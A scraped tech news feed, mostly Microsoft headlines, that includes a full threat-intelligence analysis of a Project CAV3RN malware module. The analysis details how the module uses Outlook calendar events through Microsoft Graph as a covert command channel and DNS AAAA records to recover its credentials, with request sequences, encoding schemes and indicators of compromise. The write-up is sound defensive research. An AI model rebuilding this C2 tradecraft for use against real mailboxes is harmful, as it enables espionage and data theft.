Normal view

There are new articles available, click to refresh the page.
Yesterday — 22 July 2026Main stream

Microsoft brings original Xbox backward compatibility to Windows PCs

22 July 2026 at 16:36

For years, Microsoft has leaned heavily into extensive backward compatibility across multiple generations of Xbox hardware as a major selling point for its consoles. Today, that effort expands past the console ecosystem, making select original Xbox titles officially playable (and purchasable) on Windows PCs for the first time.

The appropriately and bluntly named "Xbox Backward Compatibility on PC" program kicks off today with compatibility for BLiNX: The Time Sweeper, Conker: Live and Reloaded, Crimson Skies: High Road to Revenge, and Fuzion Frenzy. PC players can download each title for $10, but those with Xbox Game Pass subscriptions or existing digital licenses for these games on console will have instant access without an additional purchase (no such luck if you simply stick an original Xbox disc in your PC drive, alas).

Playing these older Xbox titles on PC enables some bonus graphical features like Vsync support, anisotropic filtering, enhanced anti-aliasing, and up to 4x resolution scaling of the original SD signal (to 2560x1920). Games are limited to their original frame rates and aspect ratios, though, which means a 30 fps 4:3 image in most cases. Microsoft says this first batch of games should be playable with 11-year-old GTX 950 graphics hardware, but recommends a 2017-era GTX 1070 Ti with 8GB of VRAM for best performance.

Read full article

Comments

© Reddit

I spent 10 minutes fixing Excel's ribbon—now I work faster every day

22 July 2026 at 16:00

For years, I accepted Excel's ribbon exactly as Microsoft designed it, even though I only used a fraction of its commands. After spending 10 minutes removing the clutter and reorganizing my favorite tools, I had a personalized workspace that sped up my workflow and stayed with me every time I opened Excel.

Microsoft 2.5: A new series on the people shaping the company’s future

22 July 2026 at 12:36

Nearly 20 years ago (!), in 2007, I published my first and only book: Microsoft 2.0. It focused on changes I expected at the company in the “Post-Gates” era. What would remain the same and what likely would be different once co-founder and CEO Bill Gates had left the building?

CEO Satya Nadella has not exited the company (yet). But there’s no question that Microsoft and its mission have morphed considerably in the past year or two. I’m not quite ready to christen this the Microsoft 3.0 era, even though Nadella handed the reins of Microsoft’s dominant commercial business to Judson Althoff nearly a year ago.

That decision resulted in Nadella moving into more of a “founder mode” role, allowing him to focus less on the day-to-day work of running the business. (Microsoft historians may recall that Gates made a somewhat similar move back in 2000 when he became Microsoft’s chief software architect.)

While it might not yet be time for Microsoft 3.0, we arguably could be in the “Microsoft 2.5” era. Windows and Office are still around and still play a big role. Microsoft still builds and sells developer tools and databases. But there’s no question that the cloud and all things AI are at the top of the pecking order now.

I’m embarking on a series here at GeekWire that will focus on what matters to Microsoft and, by extension, to its customers, partners, investors, and employees these days. Who are some of the people shaping and leading the company? What are their opportunities and challenges right now?

Over the next few weeks, I will be profiling various Microsoft execs working on plans for Microsoft’s ongoing evolution. Some are company veterans; some are newcomers. I’ll be talking with top execs from Microsoft’s Security, Copilot, Windows + Devices, Xbox, GitHub, and more.

I’m interested in their strategies for Microsoft’s key products and technologies and how they plan to try to turn Microsoft’s ambitious vision into reality. What are their teams building? What do they see as their biggest challenges and opportunities? And where do they see the technologies in their respective areas heading?

I feel like many of us who’ve been keeping track of the biggest tech companies (myself included) have fallen into the trap of blaming or attributing everything a company does to AI. Layoffs? AI is the culprit. Price increases? It’s all thanks to AI. Changing sales strategies? Chalk it up to AI …

But upon further reflection, I believe Microsoft’s strategy is more nuanced than “AI or bust.” There’s no question that Microsoft’s AI ambitions are shaping its goals and tactics. But Microsoft, as a heavily enterprise-focused entity, can’t simply stop supporting products that aren’t built from the ground up with AI (as much as it might like to do so). Nor can it just leave behind customers who aren’t 100% onboard with its AI moves.

Couple those enterprise hurdles with some not-so-popular consumer decisions, like axing 3,200 people in the gaming unit, and Microsoft’s approach to turning the ship looks a lot trickier.

Our Microsoft 2.5 series kicks off Thursday. Stay tuned.

Microsoft commits $60M to ‘Genesis Mission’ to help power Dept. of Energy’s AI-for-science push

22 July 2026 at 11:22
(GeekWire File Photo / Todd Bishop)

Microsoft is putting $60 million behind the U.S. Department of Energy’s Genesis Mission, a push to use artificial intelligence to speed up scientific research across the government’s 17 national labs.

The company’s investment is split into two pieces: $40 million in Azure cloud computing and AI credits over three years, and $20 million for engineering and deployment help to get DOE researchers actually using the tools, Microsoft said in a blog post Wednesday.

Microsoft is also launching a new internal group called SPARK — Scientific Partnership Advancing Research & Knowledge — to serve as the single point of contact between the company and DOE on Genesis Mission work. It’s meant to combine Microsoft’s program management, engineering, security and research teams into one coordinated effort, instead of leaving individual labs to navigate Microsoft on their own.

President Trump created the Genesis Mission through an executive order in November 2025, directing DOE to build a unified computing and data platform — since named the American Science and Security Platform — that connects the national labs’ supercomputers, AI tools and scientific datasets.

The order likened the effort’s urgency and ambition to the Manhattan Project, and the White House said it’s expanded into a whole-of-government initiative involving more than 15 federal agencies, backed by more than $5 billion in commitments.

Microsoft named four initial projects taking shape under the partnership, including work with Pacific Northwest National Laboratory in Richland, Wash., to speed up the discovery of new energy storage materials — cutting analysis that used to take years down to weeks — and autonomous lab work with Lawrence Livermore National Laboratory aimed at detecting biological threats earlier.

“We move faster together,” Chris Barry, president of Microsoft’s U.S. Public Sector business, wrote in the blog post announcing the commitment, framing the investment as both a “national security imperative” and economic opportunity for the U.S.

Microsoft isn’t the only Seattle-area cloud giant courting the Genesis Mission. Amazon Web Services was recognized by DOE as a Genesis Mission supporter in December, highlighting its work with Idaho National Laboratory on AI tools for nuclear reactor design, and the company launched its own Genesis Accelerator Initiative in February, offering up to $50 million in cloud credits for DOE-related research over three years.

Google also announced Wednesday that it was committing $40 million of AI tokens and cloud credits for researchers in support of the Genesis Mission.

Get Lifetime Access to Microsoft Office 2021 for Just $28

21 July 2026 at 08:30

Whether you're starting a new business venture and need Microsoft Office's help or you just want to get better organized in your personal life, it's a good time to take advantage of this deal.

The post Get Lifetime Access to Microsoft Office 2021 for Just $28 appeared first on TechRepublic.

Get Lifetime Access to Microsoft Office 2021 for Just $28

21 July 2026 at 08:30

Whether you're starting a new business venture and need Microsoft Office's help or you just want to get better organized in your personal life, it's a good time to take advantage of this deal.

The post Get Lifetime Access to Microsoft Office 2021 for Just $28 appeared first on TechRepublic.

This little-known Excel feature fixed one of my biggest spreadsheet problems

22 July 2026 at 07:30

After years of using Excel, it's easy to fall into muscle memory. You click the same ribbon tabs, rely on the same shortcuts, and barely notice when Microsoft adds new tools. That's how I initially overlooked Focus Cell, a simple feature that solved one of my biggest frustrations when working in Excel.

Before yesterdayMain stream

Top ERP Software Vendors in 2026

21 July 2026 at 01:00

Are you an IT manager or executive building the case for a new ERP vendor? Compare the top ERP software companies in 2026 for your business.

The post Top ERP Software Vendors in 2026 appeared first on TechRepublic.

Top ERP Software Vendors in 2026

21 July 2026 at 01:00

Are you an IT manager or executive building the case for a new ERP vendor? Compare the top ERP software companies in 2026 for your business.

The post Top ERP Software Vendors in 2026 appeared first on TechRepublic.

The must-use clipboard shortcut most Windows users have never pressed

21 July 2026 at 12:30

If you've ever used Win+Shift+S for quick screenshots, you'll know how handy it can be and how much time it can save. But there's another shortcut that's even more useful. On recent versions of Windows 11, Win+Shift+T extracts editable text directly from your screen, turning information trapped in images, PDFs, and presentation slides into text you can immediately reuse.

Microsoft Retires Copilot Podcasts and Removes Access to Previously Created Content

By: Divya
21 July 2026 at 08:23

Microsoft has announced that it will retire the Podcasts feature in its consumer Copilot app on August 18, 2026. This decision will permanently remove the ability to generate new AI-created podcasts, as well as access to all previously created content. This change affects all Copilot customers, including both free users and paid subscribers, and raises […]

The post Microsoft Retires Copilot Podcasts and Removes Access to Previously Created Content appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Microsoft Defender XDR Blind Spot Lets Public C2 Traffic Evade Detection Queries

By: Divya
21 July 2026 at 07:54

Microsoft Defender XDR users may inadvertently overlook command-and-control (C2) traffic when searching for Internet-bound connections due to a specific behavior in how IP addresses are classified. This issue arises from Kusto Query Language (KQL) detections that depend solely on filtering by RemoteIPType == “Public” in the DeviceNetworkEvents table. As a result, traffic destined for public […]

The post Microsoft Defender XDR Blind Spot Lets Public C2 Traffic Evade Detection Queries appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

I use this overlooked Excel function to turn my boring worksheets into lightweight apps

21 July 2026 at 06:30

Excel isn't known for being pretty, but the overlooked IMAGE function changes that. I'd used the IMAGE function before for simple visuals, but I wanted to see how far it could go. So I put it to the test by building a couple of interactive tools, and by the end, my spreadsheets felt more like apps than worksheets.

New Project CAV3RN module abuses Outlook calendar events for C2 and DNS AAAA records for configuration recovery

By: GReAT
21 July 2026 at 04:40

Introduction

In June 2026, as part of our Kaspersky Threat Intelligence Reporting service, we published extensive research on Project CAV3RN, a sophisticated modular framework used for cyberespionage activity against targets in Israel. We have been tracking this cluster since December 2025, and in late April 2026, we observed a major architectural shift: the developers moved from a three-component framework consisting of a downloader, executor, and uploader to a controller-based architecture with a dedicated WebSocket-enabled C2 communication component and a more extensible plugin system designed to support modular post-exploitation capabilities.

Subsequently, Check Point Research publicly reported on the same controller-based architecture in July 2026. However, neither our previous research nor the subsequent public reporting covered the latest communication component analyzed in this report.

Following our June 2026 publication, we identified a .NET Native AOT communication module that is apparently designed to replace the previous HTTP/WebSocket component. It exchanges commands and results through Outlook calendar events accessed via Microsoft Graph. If Microsoft Graph authentication or tenant validation fails, the module attempts to retrieve replacement connection settings through DNS AAAA responses.

Module network communication architecture

Module network communication architecture

During the preparation of this report, additional public research covering this communication component became available. The research presented in our article is based on our independent analysis and includes several additional implementation details that complement the existing public reporting.

Technical details

The previously reported controller-based CAV3RN architecture separates C2 communication from command execution. The controller, uxtheme.dll, generates and maintains the seven-character Agent ID, manages the polling loop, processes built-in commands, and dispatches other tasks or commands to separate plugins. The previously used communication component, n-HTCommp.dll, retrieved commands and transmitted execution results over HTTP/WebSocket.

Project CAV3RN architecture (April 2026)

Project CAV3RN architecture (April 2026)

The module performs the same communication role but uses Outlook calendar events accessed through Microsoft Graph. Similarly to the previous version, its get and send interface and use of the same controller-generated Agent ID suggest that it was designed to replace the previous communication component. However, because the corresponding updated controller was not recovered, this replacement role is assessed rather than directly observed.

C2 communication module

The communication module, AzureCommunication.dll, is a DLL compiled with .NET Native AOT, consistent with several other components of the Project CAV3RN framework that are publicly documented. Such a compilation method turns the managed application into native machine code and removes most of the metadata and intermediate language that normally make .NET assemblies straightforward to analyze.

The module exposes its functionality through a single export named QueryInterface. We expect an updated controller to load the DLL, resolve this export, and pass it a null-terminated UTF-16 string. The accepted input format closely follows the interface used by the previously documented CAV3RN controller.

get_;;_<agent-id>_,_<legacy-url>  
send_;;_<agent-id>_,_<legacy-url>_,_<result>

The _;;_ delimiter separates the operation from its arguments, while _,_ separates the arguments.

For get, the module only uses the first argument as the Agent ID. For send, it uses only the Agent ID and the result. In both cases, the additional legacy URL is ignored. It remains part of the interface for compatibility with the controller, even though the new module obtains its destination and credentials from its own Microsoft Graph configuration.

Outlook calendar events as a C2 channel

The DLL contains a complete default configuration, including the Microsoft Entra tenant ID, application credentials, target mailbox, DNS bootstrap host, and cryptographic keys required to establish communication.

Before processing either get or send operation, the module looks for a relative file named logAzure.txt. Because the code supplies only a filename, Windows resolves it against the current working directory of the process hosting the DLL.

If logAzure.txt exists, the module reads and deserializes it. If it is absent, the module builds the configuration from the hardcoded values and writes the complete object to disk with the following structure:

{
  "TenantId": "******-****-****-****-**********",  // Microsoft Entra tenant ID
  "ClientId": "********-****-****-****-************",  // application/client ID
  "ClientSecret": "********************************************",
  "UserEmail": "***@*********.co.il", // Compromised target Microsoft 365 mailbox
  "Host": "cloudlanecdn[.]com", // DNS bootstrap domain
  "PublicKey": "-----BEGIN RSA PUBLIC KEY-----\r\n[omitted]\r\n-----END RSA PUBLIC KEY-----", // outbound encryption public key
  "PrivateKey": "-----BEGIN RSA PRIVATE KEY-----\r\n[omitted]\r\n-----END RSA PRIVATE KEY-----" // inbound decryption private key
}

Using the resulting configuration, the module creates a Microsoft Graph client and validates access by requesting the tenant’s organization record through a GET request to  https://graph.microsoft.com/v1.0/organization.

Attempting this request causes the Azure Identity library to obtain an OAuth application token:

POST https://login.microsoftonline.com/<TenantId>/oauth2/v2.0/token
client_id=<ClientId>
client_secret=<ClientSecret>
scope=https://graph.microsoft.com/.default
grant_type=client_credentials

After successful authentication, the module includes the token in subsequent Graph requests using the Authorization: Bearer <access-token> header. The module uses the default calendar of the configured mailbox as a dead-drop channel. Commands, heartbeats, and results all occupy the same fixed one-hour window 2050-05-13 22:00–23:00 UTC.

Scheduling the events for 2050 makes them unlikely to appear in ordinary calendar views. The calendar event subject identifies each event’s purpose and associated Agent ID. Heartbeat and result subjects append the fixed suffix 1500 to this value; the suffix is not part of the Agent ID.

Subject format Purpose Module behavior
Event ID: <agent-id> Operator-to-agent command Searches for the event, downloads its attachments, and deletes it after consumption
Boss update ID: <agent-id>1500 Agent heartbeat Deletes the previous heartbeat event and creates a replacement
Boss Report ID: <agent-id>1500 Agent-to-operator command output Creates an event, uploads encrypted result attachments, and assigns the final subject

Receiving a command

For a get request, the module queries calendarView and filters the results by the Agent ID:

GET /v1.0/users/***@*********.co.il/calendarView?startDateTime=2050-05-13T22:00:00&endDateTime=2050-05-13T23:00:00&$filter=contains(subject,'Event ID: <agent-id>')

If Graph returns one or more matches, the module selects the first returned event and requests its attachments:

GET /v1.0/users/***@*********.co.il/events/<EventId>/attachments
Authorization: Bearer <access-token>

After obtaining the attachment response, the module deletes the calendar event:

DELETE /v1.0/users/***@*********.co.il/calendar/events/<EventId>
Authorization: Bearer <access-token>

Our analysis found a consistent difference in capitalization between command and result attachments:

Attachment name Direction Associated subject
file0.txt Operator to agent Event ID: <agent-id>
File0.txt Agent to operator Boss Report ID: <agent-id>1500

Inbound command decryption

Inbound commands use a combination of RSA and AES-GCM encryption. Once the attachments have been sorted and concatenated, the reconstructed encrypted command buffer begins with a 256-byte RSA-encrypted block containing the 32-byte AES key. The communication module decrypts this block with the RSA private key stored in its configuration, using RSA-OAEP with SHA-256.

The following 12 bytes contain the AES-GCM nonce, while the final 16 bytes contain the authentication tag. Everything between the nonce and tag is ciphertext. The module uses the recovered AES key to decrypt and authenticate this ciphertext with AES-256-GCM.

Encrypted attachment stored in a calendar event

Encrypted attachment stored in a calendar event

After RSA-OAEP-SHA256 and AES-256-GCM decryption, the 63-byte ciphertext produces {"cid": "alXBCzcDl8hBuNE", "type": "self", "cmd": "003_;;__,_"}.

Decrypted command

Decrypted command

The cid field appears to serve as a unique command-correlation identifier. As described in a previous publication of the framework, when the operator sets the JSON type field to self, the controller routes the command to its internal handler rather than dispatching it to an external plugin. In this command, the cmd field contains 003_;;__,_, where command 003 instructs the controller to toggle debug logging. After decryption, the communication module returns the complete command to the external controller through QueryInterface.

Sending command output

For a send request, the controller passes the command output to the communication module. The module encrypts the output using a newly generated AES-256-GCM key and protects that key with the configured RSA public key. It then divides the encrypted payload into chunks of up to 10 MiB.

To publish the result, the module creates a calendar event with the temporary subject d and attempts to add each encrypted chunk as a sequentially named attachment, such as File0.txt and File1.txt. After adding the attachments, it changes the subject to Boss Report ID: <agent-id>1500, marking the event as a completed result.

This process uses the following sequence of Microsoft Graph requests:

POST   /v1.0/users/***@*********.co.il/calendar/events
POST   /v1.0/users/***@*********.co.il/calendar/events/<EventId>/attachments
PATCH  /v1.0/users/***@*********.co.il/events/<EventId>

Together, the uploaded attachments contain fragments of one encrypted result package: the RSA-encrypted AES key, AES-GCM nonce, encrypted command output, and authentication tag. Recovering outbound results requires the private key corresponding to the outbound public key. This private key is assessed to be held separately by the attacker.

Heartbeat handling

The module maintains a heartbeat event identified by the subject Boss update ID: <agent-id>1500. The module searches the same fixed calendar window for a previous heartbeat associated with the agent. If one exists, the module deletes it and creates a replacement event with the temporary subject d through the following sequence of Microsoft Graph requests:

GET    /v1.0/users/***@*********.co.il/calendarView 
DELETE /v1.0/users/***@*********.co.il/events/<EventId> 
POST   /v1.0/users/***@*********.co.il/events

Finally, it updates the newly created event through the following PATCH request, replacing the temporary subject d with Boss update ID: <agent-id>1500.

PATCH /v1.0/users/***@*********.co.il/events/<EventId>
Authorization: Bearer <access-token>

{
  "subject": "Boss update ID: <agent-id>1500"
}

Heartbeat events use the same one-hour window in 2050 but contain no attachments.

The following figure summarizes the module’s operational workflow.

DNS AAAA configuration recovery mechanism

When OAuth token acquisition or the subsequent GET /v1.0/organization validation request fails, the module attempts to retrieve replacement TenantId, ClientId, ClientSecret, and UserEmail values through actor-controlled AAAA responses.

DNS-based configuration recovery (simplified)

DNS-based configuration recovery (simplified)

The module uses cloudlanecdn[.]com as its configuration-recovery domain. The domain is delegated to four actor-controlled authoritative nameservers, ns1 through ns4.cloudlanecdn[.]com, allowing the operator to generate different AAAA responses according to the Agent ID, configuration field, and fragment offset.

The module submits the generated DNS queries through the operating system’s configured recursive resolver, which follows the domain’s delegation to one of the authoritative nameservers. The returned IPv6 address is treated as a 16-byte container for protocol data rather than as a network destination.

For both get and send operations, the controller supplies the seven-character Agent ID as the first argument to QueryInterface. The communication module converts its UTF-8 bytes into two-character uppercase hexadecimal values. For example, SFmLgQZ becomes 53 46 6D 4C 67 51 5A, which the module concatenates as 53466D4C67515A.

The hexadecimal identifier is then embedded in every recovery query. The module retrieves four Microsoft Graph configuration values in a fixed order, with each value assigned a numeric index:

Index Configuration value
0 TenantId
1 ClientId
2 ClientSecret
3 UserEmail

Determining the field length through .p. queries

For each configuration value (TenantId, ClientId, ClientSecret, and UserEmail), the module first sends an AAAA query to determine the value’s total length: d.<hex-agent-id>.<field-index>.p.<host>.

In this format, <hex-agent-id> is the uppercase hexadecimal representation of the Agent ID supplied by the controller. The <field-index> identifies the requested configuration value according to the table above; for example, index 0 represents TenantId. The p marker indicates a length request, while <host> contains the configured DNS recovery domain, cloudlanecdn[.]com.

As an example, the following AAAA DNS query requests the length of the TenantId associated with Agent ID SFmLgQZ:

d.53466D4C67515A.0.p.cloudlanecdn[.]com

The AAAA response 2001:24:1234:5678:9abc:def0:1122:3344 corresponds to the byte sequence 20 01 00 24 12 34 56 78 9A BC DE F0 11 22 33 44. The module discards the first two bytes and interprets the following two bytes, 00 24, as a big-endian field length. This produces the value 0x0024, or 36 bytes. The remaining 12 bytes are ignored. The initial 2001 group is not treated as a network destination or strictly validated as a protocol marker; it simply occupies the two bytes that the module discards.

IPv6 AAAA record payload layout for obtaining length

IPv6 AAAA record payload layout for obtaining length

In the observed example, the same process produced a 36-byte TenantId, a 36-byte ClientId, a 40-byte ClientSecret, and a 28-byte UserEmail. The protocol itself supports other lengths because each value’s length is supplied dynamically by its .p. response.

To illustrate this process, we reproduced the protocol in a controlled environment using a laboratory domain.

Field length encoding in DNS AAAA record responses (example)

Field length encoding in DNS AAAA record responses (example)

Retrieving configuration data through .q. queries

After obtaining the field length from the .p. response, the module allocates a buffer of exactly that size and initializes an offset to 0. It then requests the field data using the following format: d.<hex-agent-id>.<field-index>.<offset>.q.<host>.

The <field-index> identifies the requested configuration value, while <offset> specifies where the fragment belongs in the output buffer. After checking for the sentinel address, the module discards the first two bytes of each normal .q. response and copies up to 14 of the remaining bytes. For the final response, it copies only the bytes required to reach the declared field length.

Queries continue at 14-byte offsets until the declared field length has been recovered.

The following figure shows the three .q. requests required to reconstruct a 36-byte TenantId.

TenantId retrieval process via DNS AAAA records (example)

TenantId retrieval process via DNS AAAA records (example)

In our laboratory responses, the first two bytes appear as the IPv6 group 2001 and are discarded. The responses at offsets 0 and 14 each provide 14 bytes, while the response at offset 28 supplies the final eight bytes. Concatenating and decoding these fragments produces the complete TenantId, 6f9d2a41-8c73-4b56-a1e8-2d407c95f3ab, as shown in the example figure.

The module repeats this procedure for ClientId, ClientSecret, and UserEmail. After reconstructing each value, it decodes the buffer as UTF-8, updates the corresponding configuration field, and writes the complete configuration to logAzure.txt. Once all four fields have been recovered, the module creates a new Graph client, repeats the /organization validation request, and resumes the original get or send operation if validation succeeds.

The DNS recovery mechanism updates only the TenantId, ClientId, ClientSecret, and UserEmail fields. It does not replace the configured DNS recovery host, RSA public or private keys, offering limited rotation for updating the domain itself that is used within the DNS fallback mechanism.

Failure handling and the sentinel AAAA response

In this module, the hard-coded IPv6 address 2001:4998:44:3507::8000 acts as a failure sentinel. After resolving an AAAA query, the module converts the first returned address to a string and compares it with this value before extracting any bytes. If the values match, it raises an exception and does not interpret the response as either a field length or configuration data.

The address belongs to Yahoo’s 2001:4998::/32 allocation. We could not determine why the developers selected it. The authoritative backend may return it for an unknown Agent ID, an unavailable field, an invalid index or offset, or an agent for which recovery is disabled. These conditions remain hypothetical because the backend was unavailable and the module handles every sentinel response in the same way.

Infrastructure

Historical DNS data shows that cloudlanecdn[.]com was registered on December 24, 2025. The domain initially used the Namecheap-operated nameservers dns1.registrar-servers.com and dns2.registrar-servers.com. On May 2, 2026, passive DNS first observed a transition from these vendor-managed nameservers to custom nameservers under cloudlanecdn[.]com.

Domain IP First seen ASN Hosting
ns1.cloudlanecdn[.]com 216.126.237[.]197
144.172.108[.]205
May 2, 2026 AS 14956 RouterHosting LLC
ns2.cloudlanecdn[.]com 216.126.237[.]197
144.172.108[.]205
May 2, 2026 AS 14956 RouterHosting LLC
ns3.cloudlanecdn[.]com 216.126.237[.]197
144.172.108[.]205
May 2, 2026 AS 14956 RouterHosting LLC
ns4.cloudlanecdn[.]com 144.172.108[.]205 May 21, 2026 AS 14956 RouterHosting LLC

Although the domain was delegated to four nameserver hostnames, their shared IP addresses reveal logical redundancy rather than four independently hosted DNS servers.

The shift from vendor‑managed DNS to custom in‑bailiwick authoritative nameservers aligns with the module’s DNS recovery design.

The DNS timeline overlaps with this new module’s development. Passive DNS first recorded the custom delegation on May 2, after the controller-and-plugin architecture was observed in April and before the May 19 timestamp stored in the new module. Because the custom authoritative infrastructure supports the module’s recovery protocol, we assess with moderate confidence that the infrastructure and module were prepared as part of the same development cycle.

Attribution

In our previous report, we attributed Project CAV3RN to OilRig (APT34) with low confidence. Analysis of the newly identified module provides additional evidence supporting this link.

Microsoft-hosted services for C2
Several OilRig malware strains have used Microsoft-hosted services for C2. RDAT malware exchanged commands and results through EWS email messages, and there are cases reported with the SC5k malware using Office 365 drafts, and OilCheck malware using Microsoft Graph to access Outlook drafts. CAV3RN uses the same class of service but stores commands and results in Outlook calendar events.

Secondary recovery mechanism for cloud C2
ESET previously documented OilBooster, which retrieved a replacement OAuth refresh token from a likely compromised website after repeated failures communicating with Microsoft OneDrive.

OilBooster used HTTP to recover a refresh token, whereas CAV3RN uses DNS AAAA records to recover four configuration fields. In both cases, the secondary mechanism restores access to the primary cloud C2 channel.

Compromised regional infrastructure
OilRig has previously used compromised infrastructure belonging to organizations in the regions it targets. Solar malware communicated through the compromised website of an Israeli human-resources company, while Whisper/Veaty malware used compromised Iraqi government Microsoft 365 mailboxes. The CAV3RN module similarly uses a compromised Microsoft 365 mailbox belonging to an Israeli law firm.

Based on the evidence discussed above, we retain our low-confidence assessment that Project CAV3RN is associated with OilRig. The new module shares several behavioral patterns with previously reported OilRig tooling, including the use of Microsoft-hosted services, attachment-based command exchange, and a secondary mechanism for restoring access to a cloud C2 channel. However, we identified no direct code reuse or infrastructure overlap.

Conclusions

The new module extends CAV3RN’s controller-and-plugin architecture with a Microsoft Graph-based communication transport. Its architectural continuity suggests that it was designed to replace the previous HTTP/WebSocket component with Outlook calendar events. If Graph authentication or validation fails, its DNS recovery protocol is designed to retrieve replacement connection settings.

The framework changed repeatedly between December 2025 and May 2026, indicating that development remains active. We continue to track this activity.

Indicators of compromise

Additional IoCs are available to customers of our Threat Intelligence Reporting service. For more details, contact us at intelreports@kaspersky.com.

File hashes

CAF021DDA726B8BA049C2AA395E505A1      AzureCommunication.dll
C092B02FBC0FDF7EE9608DD016673806      NewProject.dll
29B2B8C5D99F05BFCDD0D8D976EB5678      AzureCommunication.dll

Domains and IPs

cloudlanecdn[.]com
ns1[.]cloudlanecdn[.]com
ns2[.]cloudlanecdn[.]com
ns3[.]cloudlanecdn[.]com
ns4[.]cloudlanecdn[.]com
google.com[.]ayalon-print.co[.]il
clipeditskill[.]com
accesslinkssl[.]com
216[.]126[.]237[.]197
144[.]172[.]108[.]205

This free, open-source app changed the way I think about paid software

20 July 2026 at 16:00

I use FOSS (free and open-source) tools every day on my Linux machine. But before I started really getting into it, there was one app that changed the way I thought about software to that point: LibreOffice. Discovering it changed my mind about how I use software and I consider it a hidden gem that's hiding in plain sight.

❌
❌